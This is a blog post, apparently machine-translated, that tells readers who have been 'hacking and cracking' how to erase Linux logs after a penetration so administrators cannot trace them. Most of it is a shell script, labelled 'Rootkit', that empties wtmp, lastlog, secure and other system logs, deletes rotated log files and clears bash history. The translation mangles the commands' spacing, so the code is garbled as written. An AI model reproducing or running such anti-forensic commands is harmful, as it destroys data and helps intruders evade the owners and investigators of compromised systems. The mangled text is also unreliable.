afternoon friends, exhausted earlier ane streets blog to friends and forums IBT, ane nih find any good thread, which is about how to delete the logs on Linux after penetration. ane get a this information from friends ane friend gnome_selpa.
so without us knowing, as we do the hacking and cracking activity, we trace the form of browsing, scanning, etc. will be stored in their caching server and the admin can easily find us the tracker.
indeed, we could use firefox autoproxynya to disguise our public IP.
directly to the scene friends: D
First, copy and paste and save this file:
echo> / var / log / wtmp
echo> / var / log / lastlog
echo> / var / log / messages
echo> / var / log / secure
echo> / var / log / maillog
echo> / var / log / xferlog
rm-rf / var / log / *. old &> / dev / null
rm-rf / var / log / * .0 &> / dev / null
rm-rf / var / log / * .1 &> / dev / null
rm-rf / var / log / * .2 &> / dev / null
rm-rf / var / log / * .3 &> / dev / null
rm-rf / var / log / *. gz &> / dev / null
rm-rf / var / log / samba / *. old &> / dev / null
rm-rf / var / log / samba / * .0 &> / dev / null
rm-rf / var / log / samba / * .1 &> / dev / null
rm-rf / var / log / samba / * .2 &> / dev / null
rm-rf / var / log / samba / * .3 &> / dev / null
rm-rf / var / log / samba / *. gz &> / dev / null
rm-rf / var / log / apt / *. old &> / dev / null
rm-rf / var / log / apt / * .0 &> / dev / null
rm-rf / var / log / apt / * .1 &> / dev / null
rm-rf / var / log / apt / * .2 &> / dev / null
rm-rf / var / log / apt / * .3 &> / dev / null
rm-rf / var / log / apt / *. gz &> / dev / null
rm-rf / var / log / gdm / *. old &> / dev / null
rm-rf / var / log / gdm / * .0 &> / dev / null
rm-rf / var / log / gdm / * .1 &> / dev / null
rm-rf / var / log / gdm / * .2 &> / dev / null
rm-rf / var / log / gdm / * .3 &> / dev / null
rm-rf / var / log / gdm / *. gz &> / dev / null
rm-rf / var / log / cups / *. old &> / dev / null
rm-rf / var / log / cups / * .0 &> / dev / null
rm-rf / var / log / cups / * .1 &> / dev / null
rm-rf / var / log / cups / * .2 &> / dev / null
rm-rf / var / log / cups / * .3 &> / dev / null
rm-rf / var / log / cups / *. gz &> / dev / null
history-c
echo> / root / .bash_history
save it as Rootkit.
I run the file was removed existent Rootkit.txt example (meaning friend had to remove his txt existent, so be Rootkit only). Then made to root permissions (file permissions) to be executed.
jalaninnya created in the terminal, type:
chmod + x Rootkit
after it is run by typing:
. / Rootkit
and finally we've delete all the logs when scanning, penetration, hacking, and cracking earlier.
for more details can check at: here
or to a forum: here
source : sonyrimawanadhysaputra.blogspot.com
Tuesday, April 16, 2013
Home
Unlabelled
How to Erase Log In Linux After Penetration
How to Erase Log In Linux After Penetration
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment